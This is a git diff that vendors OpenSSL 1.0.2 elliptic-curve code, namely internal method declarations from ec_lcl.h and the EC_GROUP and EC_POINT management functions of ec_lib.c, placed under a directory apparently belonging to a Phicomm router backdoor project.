+int ec_GF2m_simple_field_div(const EC_GROUP *, BIGNUM *r, const BIGNUM *a,
+                             const BIGNUM *b, BN_CTX *);
+
+/* method functions in ec2_mult.c */
+int ec_GF2m_simple_mul(const EC_GROUP *group, EC_POINT *r,
+                       const BIGNUM *scalar, size_t num,
+                       const EC_POINT *points[], const BIGNUM *scalars[],
+                       BN_CTX *);
+int ec_GF2m_precompute_mult(EC_GROUP *group, BN_CTX *ctx);
+int ec_GF2m_have_precompute_mult(const EC_GROUP *group);
+
+/* method functions in ec2_mult.c */
+int ec_GF2m_simple_mul(const EC_GROUP *group, EC_POINT *r,
+                       const BIGNUM *scalar, size_t num,
+                       const EC_POINT *points[], const BIGNUM *scalars[],
+                       BN_CTX *);
+int ec_GF2m_precompute_mult(EC_GROUP *group, BN_CTX *ctx);
+int ec_GF2m_have_precompute_mult(const EC_GROUP *group);
+
+#ifndef OPENSSL_NO_EC_NISTP_64_GCC_128
+/* method functions in ecp_nistp224.c */
+int ec_GFp_nistp224_group_init(EC_GROUP *group);
+int ec_GFp_nistp224_group_set_curve(EC_GROUP *group, const BIGNUM *p,
+                                    const BIGNUM *a, const BIGNUM *n,
+                                    BN_CTX *);
+int ec_GFp_nistp224_point_get_affine_coordinates(const EC_GROUP *group,
+                                                 const EC_POINT *point,
+                                                 BIGNUM *x, BIGNUM *y,
+                                                 BN_CTX *ctx);
+int ec_GFp_nistp224_mul(const EC_GROUP *group, EC_POINT *r,
+                        const BIGNUM *scalar, size_t num,
+                        const EC_POINT *points[], const BIGNUM *scalars[],
+                        BN_CTX *);
+int ec_GFp_nistp224_points_mul(const EC_GROUP *group, EC_POINT *r,
+                               const BIGNUM *scalar, size_t num,
+                               const EC_POINT *points[],
+                               const BIGNUM *scalars[], BN_CTX *ctx);
+int ec_GFp_nistp224_precompute_mult(EC_GROUP *group, BN_CTX *ctx);
+int ec_GFp_nistp224_have_precompute_mult(const EC_GROUP *group);
+
+/* method functions in ecp_nistp256.c */
+int ec_GFp_nistp256_group_init(EC_GROUP *group);
+int ec_GFp_nistp256_group_set_curve(EC_GROUP *group, const BIGNUM *p,
+                                    const BIGNUM *a, const BIGNUM *n,
+                                    BN_CTX *);
+int ec_GFp_nistp256_point_get_affine_coordinates(const EC_GROUP *group,
+                                                 const EC_POINT *point,
+                                                 BIGNUM *x, BIGNUM *y,
+                                                 BN_CTX *ctx);
+int ec_GFp_nistp256_mul(const EC_GROUP *group, EC_POINT *r,
+                        const BIGNUM *scalar, size_t num,
+                        const EC_POINT *points[], const BIGNUM *scalars[],
+                        BN_CTX *);
+int ec_GFp_nistp256_points_mul(const EC_GROUP *group, EC_POINT *r,
+                               const BIGNUM *scalar, size_t num,
+                               const EC_POINT *points[],
+                               const BIGNUM *scalars[], BN_CTX *ctx);
+int ec_GFp_nistp256_precompute_mult(EC_GROUP *group, BN_CTX *ctx);
+int ec_GFp_nistp256_have_precompute_mult(const EC_GROUP *group);
+
+/* method functions in ecp_nistp521.c */
+int ec_GFp_nistp521_group_init(EC_GROUP *group);
+int ec_GFp_nistp521_group_set_curve(EC_GROUP *group, const BIGNUM *p,
+                                    const BIGNUM *a, const BIGNUM *n,
+                                    BN_CTX *);
+int ec_GFp_nistp521_point_get_affine_coordinates(const EC_GROUP *group,
+                                                 const EC_POINT *point,
+                                                 BIGNUM *x, BIGNUM *y,
+                                                 BN_CTX *ctx);
+int ec_GFp_nistp521_mul(const EC_GROUP *group, EC_POINT *r,
+                        const BIGNUM *scalar, size_t num,
+                        const EC_POINT *points[], const BIGNUM *scalars[],
+                        BN_CTX *);
+int ec_GFp_nistp521_points_mul(const EC_GROUP *group, EC_POINT *r,
+                               const BIGNUM *scalar, size_t num,
+                               const EC_POINT *points[],
+                               const BIGNUM *scalars[], BN_CTX *ctx);
+int ec_GFp_nistp521_precompute_mult(EC_GROUP *group, BN_CTX *ctx);
+int ec_GFp_nistp521_have_precompute_mult(const EC_GROUP *group);
+
+/* utility functions in ecp_nistputil.c */
+void ec_GFp_nistp_points_make_affine_internal(size_t num, void *point_array,
+                                              size_t felem_size,
+                                              void *tmp_felems,
+                                              void (*felem_one) (void *out),
+                                              int (*felem_is_zero) (const void
+                                                                    *in),
+                                              void (*felem_assign) (void *out,
+                                                                    const void
+                                                                    *in),
+                                              void (*felem_square) (void *out,
+                                                                    const void
+                                                                    *in),
+                                              void (*felem_mul) (void *out,
+                                                                 const void
+                                                                 *in1,
+                                                                 const void
+                                                                 *in2),
+                                              void (*felem_inv) (void *out,
+                                                                 const void
+                                                                 *in),
+                                              void (*felem_contract) (void
+                                                                      *out,
+                                                                      const
+                                                                      void
+                                                                      *in));
+void ec_GFp_nistp_recode_scalar_bits(unsigned char *sign,
+                                     unsigned char *digit, unsigned char in);
+#endif
+int ec_precompute_mont_data(EC_GROUP *);
+
+#ifdef ECP_NISTZ256_ASM
+/** Returns GFp methods using montgomery multiplication, with x86-64 optimized
+ * P256. See http://eprint.iacr.org/2013/816.
+ *  \return  EC_METHOD object
+ */
+const EC_METHOD *EC_GFp_nistz256_method(void);
+#endif
+
+#ifdef OPENSSL_FIPS
+EC_GROUP *FIPS_ec_group_new_curve_gfp(const BIGNUM *p, const BIGNUM *a,
+                                      const BIGNUM *b, BN_CTX *ctx);
+EC_GROUP *FIPS_ec_group_new_curve_gf2m(const BIGNUM *p, const BIGNUM *a,
+                                       const BIGNUM *b, BN_CTX *ctx);
+EC_GROUP *FIPS_ec_group_new_by_curve_name(int nid);
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_lib.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_lib.c
new file mode 100644
index 0000000..6ffd9fc
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_lib.c
@@ -0,0 +1,1127 @@
+/* crypto/ec/ec_lib.c */
+/*
+ * Originally written by Bodo Moeller for the OpenSSL project.
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2003 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* ====================================================================
+ * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
+ * Binary polynomial ECC support in OpenSSL originally developed by
+ * SUN MICROSYSTEMS, INC., and contributed to the OpenSSL project.
+ */
+
+#include <string.h>
+
+#include <openssl/err.h>
+#include <openssl/opensslv.h>
+
+#include "ec_lcl.h"
+
+const char EC_version[] = "EC" OPENSSL_VERSION_PTEXT;
+
+/* functions for EC_GROUP objects */
+
+EC_GROUP *EC_GROUP_new(const EC_METHOD *meth)
+{
+    EC_GROUP *ret;
+
+    if (meth == NULL) {
+        ECerr(EC_F_EC_GROUP_NEW, EC_R_SLOT_FULL);
+        return NULL;
+    }
+    if (meth->group_init == 0) {
+        ECerr(EC_F_EC_GROUP_NEW, ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+        return NULL;
+    }
+
+    ret = OPENSSL_malloc(sizeof *ret);
+    if (ret == NULL) {
+        ECerr(EC_F_EC_GROUP_NEW, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+
+    ret->meth = meth;
+
+    ret->extra_data = NULL;
+    ret->mont_data = NULL;
+
+    ret->generator = NULL;
+    BN_init(&ret->order);
+    BN_init(&ret->cofactor);
+
+    ret->curve_name = 0;
+    ret->asn1_flag = ~EC_GROUP_ASN1_FLAG_MASK;
+    ret->asn1_form = POINT_CONVERSION_UNCOMPRESSED;
+
+    ret->seed = NULL;
+    ret->seed_len = 0;
+
+    if (!meth->group_init(ret)) {
+        OPENSSL_free(ret);
+        return NULL;
+    }
+
+    return ret;
+}
+
+void EC_GROUP_free(EC_GROUP *group)
+{
+    if (!group)
+        return;
+
+    if (group->meth->group_finish != 0)
+        group->meth->group_finish(group);
+
+    EC_EX_DATA_free_all_data(&group->extra_data);
+
+    if (EC_GROUP_VERSION(group) && group->mont_data)
+        BN_MONT_CTX_free(group->mont_data);
+
+    if (group->generator != NULL)
+        EC_POINT_free(group->generator);
+    BN_free(&group->order);
+    BN_free(&group->cofactor);
+
+    if (group->seed)
+        OPENSSL_free(group->seed);
+
+    OPENSSL_free(group);
+}
+
+void EC_GROUP_clear_free(EC_GROUP *group)
+{
+    if (!group)
+        return;
+
+    if (group->meth->group_clear_finish != 0)
+        group->meth->group_clear_finish(group);
+    else if (group->meth->group_finish != 0)
+        group->meth->group_finish(group);
+
+    EC_EX_DATA_clear_free_all_data(&group->extra_data);
+
+    if (EC_GROUP_VERSION(group) && group->mont_data)
+        BN_MONT_CTX_free(group->mont_data);
+
+    if (group->generator != NULL)
+        EC_POINT_clear_free(group->generator);
+    BN_clear_free(&group->order);
+    BN_clear_free(&group->cofactor);
+
+    if (group->seed) {
+        OPENSSL_cleanse(group->seed, group->seed_len);
+        OPENSSL_free(group->seed);
+    }
+
+    OPENSSL_cleanse(group, sizeof *group);
+    OPENSSL_free(group);
+}
+
+int EC_GROUP_copy(EC_GROUP *dest, const EC_GROUP *src)
+{
+    EC_EXTRA_DATA *d;
+
+    if (dest->meth->group_copy == 0) {
+        ECerr(EC_F_EC_GROUP_COPY, ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+        return 0;
+    }
+    if (dest->meth != src->meth) {
+        ECerr(EC_F_EC_GROUP_COPY, EC_R_INCOMPATIBLE_OBJECTS);
+        return 0;
+    }
+    if (dest == src)
+        return 1;
+
+    EC_EX_DATA_free_all_data(&dest->extra_data);
+
+    for (d = src->extra_data; d != NULL; d = d->next) {
+        void *t = d->dup_func(d->data);
+
+        if (t == NULL)
+            return 0;
+        if (!EC_EX_DATA_set_data
+            (&dest->extra_data, t, d->dup_func, d->free_func,
+             d->clear_free_func))
+            return 0;
+    }
+
+    if (EC_GROUP_VERSION(src) && src->mont_data != NULL) {
+        if (dest->mont_data == NULL) {
+            dest->mont_data = BN_MONT_CTX_new();
+            if (dest->mont_data == NULL)
+                return 0;
+        }
+        if (!BN_MONT_CTX_copy(dest->mont_data, src->mont_data))
+            return 0;
+    } else {
+        /* src->generator == NULL */
+        if (EC_GROUP_VERSION(dest) && dest->mont_data != NULL) {
+            BN_MONT_CTX_free(dest->mont_data);
+            dest->mont_data = NULL;
+        }
+    }
+
+    if (src->generator != NULL) {
+        if (dest->generator == NULL) {
+            dest->generator = EC_POINT_new(dest);
+            if (dest->generator == NULL)
+                return 0;
+        }
+        if (!EC_POINT_copy(dest->generator, src->generator))
+            return 0;
+    } else {
+        /* src->generator == NULL */
+        if (dest->generator != NULL) {
+            EC_POINT_clear_free(dest->generator);
+            dest->generator = NULL;
+        }
+    }
+
+    if (!BN_copy(&dest->order, &src->order))
+        return 0;
+    if (!BN_copy(&dest->cofactor, &src->cofactor))
+        return 0;
+
+    dest->curve_name = src->curve_name;
+    dest->asn1_flag = src->asn1_flag;
+    dest->asn1_form = src->asn1_form;
+
+    if (src->seed) {
+        if (dest->seed)
+            OPENSSL_free(dest->seed);
+        dest->seed = OPENSSL_malloc(src->seed_len);
+        if (dest->seed == NULL)
+            return 0;
+        if (!memcpy(dest->seed, src->seed, src->seed_len))
+            return 0;
+        dest->seed_len = src->seed_len;
+    } else {
+        if (dest->seed)
+            OPENSSL_free(dest->seed);
+        dest->seed = NULL;
+        dest->seed_len = 0;
+    }
+
+    return dest->meth->group_copy(dest, src);
+}
+
+EC_GROUP *EC_GROUP_dup(const EC_GROUP *a)
+{
+    EC_GROUP *t = NULL;
+    int ok = 0;
+
+    if (a == NULL)
+        return NULL;
+
+    if ((t = EC_GROUP_new(a->meth)) == NULL)
+        return (NULL);
+    if (!EC_GROUP_copy(t, a))
+        goto err;
+
+    ok = 1;
+
+ err:
+    if (!ok) {
+        if (t)
+            EC_GROUP_free(t);
+        return NULL;
+    } else
+        return t;
+}
+
+const EC_METHOD *EC_GROUP_method_of(const EC_GROUP *group)
+{
+    return group->meth;
+}
+
+int EC_METHOD_get_field_type(const EC_METHOD *meth)
+{
+    return meth->field_type;
+}
+
+int EC_GROUP_set_generator(EC_GROUP *group, const EC_POINT *generator,
+                           const BIGNUM *order, const BIGNUM *cofactor)
+{
+    if (generator == NULL) {
+        ECerr(EC_F_EC_GROUP_SET_GENERATOR, ERR_R_PASSED_NULL_PARAMETER);
+        return 0;
+    }
+
+    if (group->generator == NULL) {
+        group->generator = EC_POINT_new(group);
+        if (group->generator == NULL)
+            return 0;
+    }
+    if (!EC_POINT_copy(group->generator, generator))
+        return 0;
+
+    if (order != NULL) {
+        if (!BN_copy(&group->order, order))
+            return 0;
+    } else
+        BN_zero(&group->order);
+
+    if (cofactor != NULL) {
+        if (!BN_copy(&group->cofactor, cofactor))
+            return 0;
+    } else
+        BN_zero(&group->cofactor);
+
+    /*
+     * We ignore the return value because some groups have an order with
+     * factors of two, which makes the Montgomery setup fail.
+     * |group->mont_data| will be NULL in this case.
+     */
+    ec_precompute_mont_data(group);
+
+    return 1;
+}
+
+const EC_POINT *EC_GROUP_get0_generator(const EC_GROUP *group)
+{
+    return group->generator;
+}
+
+BN_MONT_CTX *EC_GROUP_get_mont_data(const EC_GROUP *group)
+{
+    return EC_GROUP_VERSION(group) ? group->mont_data : NULL;
+}
+
+int EC_GROUP_get_order(const EC_GROUP *group, BIGNUM *order, BN_CTX *ctx)
+{
+    if (!BN_copy(order, &group->order))
+        return 0;
+
+    return !BN_is_zero(order);
+}
+
+int EC_GROUP_get_cofactor(const EC_GROUP *group, BIGNUM *cofactor,
+                          BN_CTX *ctx)
+{
+    if (!BN_copy(cofactor, &group->cofactor))
+        return 0;
+
+    return !BN_is_zero(&group->cofactor);
+}
+
+void EC_GROUP_set_curve_name(EC_GROUP *group, int nid)
+{
+    group->curve_name = nid;
+}
+
+int EC_GROUP_get_curve_name(const EC_GROUP *group)
+{
+    return group->curve_name;
+}
+
+void EC_GROUP_set_asn1_flag(EC_GROUP *group, int flag)
+{
+    group->asn1_flag &= ~EC_GROUP_ASN1_FLAG_MASK;
+    group->asn1_flag |= flag & EC_GROUP_ASN1_FLAG_MASK;
+}
+
+int EC_GROUP_get_asn1_flag(const EC_GROUP *group)
+{
+    return group->asn1_flag & EC_GROUP_ASN1_FLAG_MASK;
+}
+
+void EC_GROUP_set_point_conversion_form(EC_GROUP *group,
+                                        point_conversion_form_t form)
+{
+    group->asn1_form = form;
+}
+
+point_conversion_form_t EC_GROUP_get_point_conversion_form(const EC_GROUP
+                                                           *group)
+{
+    return group->asn1_form;
+}
+
+size_t EC_GROUP_set_seed(EC_GROUP *group, const unsigned char *p, size_t len)
+{
+    if (group->seed) {
+        OPENSSL_free(group->seed);
+        group->seed = NULL;
+        group->seed_len = 0;
+    }
+
+    if (!len || !p)
+        return 1;
+
+    if ((group->seed = OPENSSL_malloc(len)) == NULL)
+        return 0;
+    memcpy(group->seed, p, len);
+    group->seed_len = len;
+
+    return len;
+}
+
+unsigned char *EC_GROUP_get0_seed(const EC_GROUP *group)
+{
+    return group->seed;
+}
+
+size_t EC_GROUP_get_seed_len(const EC_GROUP *group)
+{
+    return group->seed_len;
+}
+
+int EC_GROUP_set_curve_GFp(EC_GROUP *group, const BIGNUM *p, const BIGNUM *a,
+                           const BIGNUM *b, BN_CTX *ctx)
+{
+    if (group->meth->group_set_curve == 0) {
+        ECerr(EC_F_EC_GROUP_SET_CURVE_GFP, ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+        return 0;
+    }
+    return group->meth->group_set_curve(group, p, a, b, ctx);
+}
+
+int EC_GROUP_get_curve_GFp(const EC_GROUP *group, BIGNUM *p, BIGNUM *a,
+                           BIGNUM *b, BN_CTX *ctx)
+{
+    if (group->meth->group_get_curve == 0) {
+        ECerr(EC_F_EC_GROUP_GET_CURVE_GFP, ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+        return 0;
+    }
+    return group->meth->group_get_curve(group, p, a, b, ctx);
+}
+
+#ifndef OPENSSL_NO_EC2M
+int EC_GROUP_set_curve_GF2m(EC_GROUP *group, const BIGNUM *p, const BIGNUM *a,
+                            const BIGNUM *b, BN_CTX *ctx)
+{
+    if (group->meth->group_set_curve == 0) {
+        ECerr(EC_F_EC_GROUP_SET_CURVE_GF2M,
+              ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+        return 0;
+    }
+    return group->meth->group_set_curve(group, p, a, b, ctx);
+}
+
+int EC_GROUP_get_curve_GF2m(const EC_GROUP *group, BIGNUM *p, BIGNUM *a,
+                            BIGNUM *b, BN_CTX *ctx)
+{
+    if (group->meth->group_get_curve == 0) {
+        ECerr(EC_F_EC_GROUP_GET_CURVE_GF2M,
+              ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+        return 0;
+    }
+    return group->meth->group_get_curve(group, p, a, b, ctx);
+}
+#endif
+
+int EC_GROUP_get_degree(const EC_GROUP *group)
+{
+    if (group->meth->group_get_degree == 0) {
+        ECerr(EC_F_EC_GROUP_GET_DEGREE, ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+        return 0;
+    }
+    return group->meth->group_get_degree(group);
+}
+
+int EC_GROUP_check_discriminant(const EC_GROUP *group, BN_CTX *ctx)
+{
+    if (group->meth->group_check_discriminant == 0) {
+        ECerr(EC_F_EC_GROUP_CHECK_DISCRIMINANT,
+              ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+        return 0;
+    }
+    return group->meth->group_check_discriminant(group, ctx);
+}
+
+int EC_GROUP_cmp(const EC_GROUP *a, const EC_GROUP *b, BN_CTX *ctx)
+{
+    int r = 0;
+    BIGNUM *a1, *a2, *a3, *b1, *b2, *b3;
+    BN_CTX *ctx_new = NULL;
+
+    /* compare the field types */
+    if (EC_METHOD_get_field_type(EC_GROUP_method_of(a)) !=
+        EC_METHOD_get_field_type(EC_GROUP_method_of(b)))
+        return 1;
+    /* compare the curve name (if present in both) */
+    if (EC_GROUP_get_curve_name(a) && EC_GROUP_get_curve_name(b) &&
+        EC_GROUP_get_curve_name(a) != EC_GROUP_get_curve_name(b))
+        return 1;
+
+    if (!ctx)
+        ctx_new = ctx = BN_CTX_new();
+    if (!ctx)
+        return -1;
+
+    BN_CTX_start(ctx);
+    a1 = BN_CTX_get(ctx);
+    a2 = BN_CTX_get(ctx);
+    a3 = BN_CTX_get(ctx);
+    b1 = BN_CTX_get(ctx);
+    b2 = BN_CTX_get(ctx);
+    b3 = BN_CTX_get(ctx);
+    if (!b3) {
+        BN_CTX_end(ctx);
+        if (ctx_new)
+            BN_CTX_free(ctx);
+        return -1;
+    }
+
+    /*
+     * XXX This approach assumes that the external representation of curves
+     * over the same field type is the same.
+     */
+    if (!a->meth->group_get_curve(a, a1, a2, a3, ctx) ||
+        !b->meth->group_get_curve(b, b1, b2, b3, ctx))
+        r = 1;
+
+    if (r || BN_cmp(a1, b1) || BN_cmp(a2, b2) || BN_cmp(a3, b3))
+        r = 1;
+
+    /* XXX EC_POINT_cmp() assumes that the methods are equal */
+    if (r || EC_POINT_cmp(a, EC_GROUP_get0_generator(a),
+                          EC_GROUP_get0_generator(b), ctx))
+        r = 1;
+
+    if (!r) {
+        /* compare the order and cofactor */
+        if (!EC_GROUP_get_order(a, a1, ctx) ||
+            !EC_GROUP_get_order(b, b1, ctx) ||
+            !EC_GROUP_get_cofactor(a, a2, ctx) ||
+            !EC_GROUP_get_cofactor(b, b2, ctx)) {
+            BN_CTX_end(ctx);
+            if (ctx_new)
+                BN_CTX_free(ctx);
+            return -1;
+        }
+        if (BN_cmp(a1, b1) || BN_cmp(a2, b2))
+            r = 1;
+    }
+
+    BN_CTX_end(ctx);
+    if (ctx_new)
+        BN_CTX_free(ctx);
+
+    return r;
+}
+
+/* this has 'package' visibility */
+int EC_EX_DATA_set_data(EC_EXTRA_DATA **ex_data, void *data,
+                        void *(*dup_func) (void *),
+                        void (*free_func) (void *),
+                        void (*clear_free_func) (void *))
+{
+    EC_EXTRA_DATA *d;
+
+    if (ex_data == NULL)
+        return 0;
+
+    for (d = *ex_data; d != NULL; d = d->next) {
+        if (d->dup_func == dup_func && d->free_func == free_func
+            && d->clear_free_func == clear_free_func) {
+            ECerr(EC_F_EC_EX_DATA_SET_DATA, EC_R_SLOT_FULL);
+            return 0;
+        }
+    }
+
+    if (data == NULL)
+        /* no explicit entry needed */
+        return 1;
+
+    d = OPENSSL_malloc(sizeof *d);
+    if (d == NULL)
+        return 0;
+
+    d->data = data;
+    d->dup_func = dup_func;
+    d->free_func = free_func;
+    d->clear_free_func = clear_free_func;
+
+    d->next = *ex_data;
+    *ex_data = d;
+
+    return 1;
+}
+
+/* this has 'package' visibility */
+void *EC_EX_DATA_get_data(const EC_EXTRA_DATA *ex_data,
+                          void *(*dup_func) (void *),
+                          void (*free_func) (void *),
+                          void (*clear_free_func) (void *))
+{
+    const EC_EXTRA_DATA *d;
+
+    for (d = ex_data; d != NULL; d = d->next) {
+        if (d->dup_func == dup_func && d->free_func == free_func
+            && d->clear_free_func == clear_free_func)
+            return d->data;
+    }
+
+    return NULL;
+}
+
+/* this has 'package' visibility */
+void EC_EX_DATA_free_data(EC_EXTRA_DATA **ex_data,
+                          void *(*dup_func) (void *),
+                          void (*free_func) (void *),
+                          void (*clear_free_func) (void *))
+{
+    EC_EXTRA_DATA **p;
+
+    if (ex_data == NULL)
+        return;
+
+    for (p = ex_data; *p != NULL; p = &((*p)->next)) {
+        if ((*p)->dup_func == dup_func && (*p)->free_func == free_func
+            && (*p)->clear_free_func == clear_free_func) {
+            EC_EXTRA_DATA *next = (*p)->next;
+
+            (*p)->free_func((*p)->data);
+            OPENSSL_free(*p);
+
+            *p = next;
+            return;
+        }
+    }
+}
+
+/* this has 'package' visibility */
+void EC_EX_DATA_clear_free_data(EC_EXTRA_DATA **ex_data,
+                                void *(*dup_func) (void *),
+                                void (*free_func) (void *),
+                                void (*clear_free_func) (void *))
+{
+    EC_EXTRA_DATA **p;
+
+    if (ex_data == NULL)
+        return;
+
+    for (p = ex_data; *p != NULL; p = &((*p)->next)) {
+        if ((*p)->dup_func == dup_func && (*p)->free_func == free_func
+            && (*p)->clear_free_func == clear_free_func) {
+            EC_EXTRA_DATA *next = (*p)->next;
+
+            (*p)->clear_free_func((*p)->data);
+            OPENSSL_free(*p);
+
+            *p = next;
+            return;
+        }
+    }
+}
+
+/* this has 'package' visibility */
+void EC_EX_DATA_free_all_data(EC_EXTRA_DATA **ex_data)
+{
+    EC_EXTRA_DATA *d;
+
+    if (ex_data == NULL)
+        return;
+
+    d = *ex_data;
+    while (d) {
+        EC_EXTRA_DATA *next = d->next;
+
+        d->free_func(d->data);
+        OPENSSL_free(d);
+
+        d = next;
+    }
+    *ex_data = NULL;
+}
+
+/* this has 'package' visibility */
+void EC_EX_DATA_clear_free_all_data(EC_EXTRA_DATA **ex_data)
+{
+    EC_EXTRA_DATA *d;
+
+    if (ex_data == NULL)
+        return;
+
+    d = *ex_data;
+    while (d) {
+        EC_EXTRA_DATA *next = d->next;
+
+        d->clear_free_func(d->data);
+        OPENSSL_free(d);
+
+        d = next;
+    }
+    *ex_data = NULL;
+}
+
+/* functions for EC_POINT objects */
+
+EC_POINT *EC_POINT_new(const EC_GROUP *group)
+{
+    EC_POINT *ret;
+
+    if (group == NULL) {
+        ECerr(EC_F_EC_POINT_NEW, ERR_R_PASSED_NULL_PARAMETER);
+        return NULL;
+    }
+    if (group->meth->point_init == 0) {
+        ECerr(EC_F_EC_POINT_NEW, ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+        return NULL;
+    }
+
+    ret = OPENSSL_malloc(sizeof *ret);
+    if (ret == NULL) {
+        ECerr(EC_F_EC_POINT_NEW, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+
+    ret->meth = group->meth;
+
+    if (!ret->meth->point_init(ret)) {
+        OPENSSL_free(ret);
+        return NULL;
+    }
+
+    return ret;
+}
+
+void EC_POINT_free(EC_POINT *point)
+{
+    if (!point)
+        return;
+
+    if (point->meth->point_finish != 0)
+        point->meth->point_finish(point);
+    OPENSSL_free(point);
+}
+
+void EC_POINT_clear_free(EC_POINT *point)
+{
+    if (!point)
+        return;
+
+    if (point->meth->point_clear_finish != 0)
+        point->meth->point_clear_finish(point);
+    else if (point->meth->point_finish != 0)
+        point->meth->point_finish(point);
+    OPENSSL_cleanse(point, sizeof *point);
+    OPENSSL_free(point);
+}
+
+int EC_POINT_copy(EC_POINT *dest, const EC_POINT *src)
+{
+    if (dest->meth->point_copy == 0) {
+        ECerr(EC_F_EC_POINT_COPY, ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+        return 0;
+    }
+    if (dest->meth != src->meth) {
+        ECerr(EC_F_EC_POINT_COPY, EC_R_INCOMPATIBLE_OBJECTS);
+        return 0;
+    }
+    if (dest == src)
+        return 1;
+    return dest->meth->point_copy(dest, src);
+}
+
+EC_POINT *EC_POINT_dup(const EC_POINT *a, const EC_GROUP *group)
+{
+    EC_POINT *t;
+    int r;
+
+    if (a == NULL)
+        return NULL;
+
+    t = EC_POINT_new(group);
+    if (t == NULL)
+        return (NULL);
+    r = EC_POINT_copy(t, a);
+    if (!r) {
+        EC_POINT_free(t);
+        return NULL;
+    } else
+        return t;
+}
+
+const EC_METHOD *EC_POINT_method_of(const EC_POINT *point)
+{
+    return point->meth;
+}
+
+int EC_POINT_set_to_infinity(const EC_GROUP *group, EC_POINT *point)
+{
+    if (group->meth->point_set_to_infinity == 0) {
+        ECerr(EC_F_EC_POINT_SET_TO_INFINITY,
+              ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+        return 0;
+    }
+    if (group->meth != point->meth) {
+        ECerr(EC_F_EC_POINT_SET_TO_INFINITY, EC_R_INCOMPATIBLE_OBJECTS);
+        return 0;
+    }
+    return group->meth->point_set_to_infinity(group, point);
+}
+
+int EC_POINT_set_Jprojective_coordinates_GFp(const EC_GROUP *group,
+                                             EC_POINT *point, const BIGNUM *x,
+                                             const BIGNUM *y, const BIGNUM *z,
+                                             BN_CTX *ctx)
+{
+    if (group->meth->point_set_Jprojective_coordinates_GFp == 0) {
+        ECerr(EC_F_EC_POINT_SET_JPROJECTIVE_COORDINATES_GFP,
+              ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+        return 0;
+    }
+    if (group->meth != point->meth) {
+        ECerr(EC_F_EC_POINT_SET_JPROJECTIVE_COORDINATES_GFP,
+              EC_R_INCOMPATIBLE_OBJECTS);
+        return 0;
+    }
+    return group->meth->point_set_Jprojective_coordinates_GFp(group, point, x,
+                                                              y, z, ctx);
+}
+
+int EC_POINT_get_Jprojective_coordinates_GFp(const EC_GROUP *group,
+                                             const EC_POINT *point, BIGNUM *x,
+                                             BIGNUM *y, BIGNUM *z,
+                                             BN_CTX *ctx)
+{
+    if (group->meth->point_get_Jprojective_coordinates_GFp == 0) {
+        ECerr(EC_F_EC_POINT_GET_JPROJECTIVE_COORDINATES_GFP,
+              ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+        return 0;
+    }
+    if (group->meth != point->meth) {
+        ECerr(EC_F_EC_POINT_GET_JPROJECTIVE_COORDINATES_GFP,
+              EC_R_INCOMPATIBLE_OBJECTS);
+        return 0;
+    }
+    return group->meth->point_get_Jprojective_coordinates_GFp(group, point, x,
+                                                              y, z, ctx);
+}
+
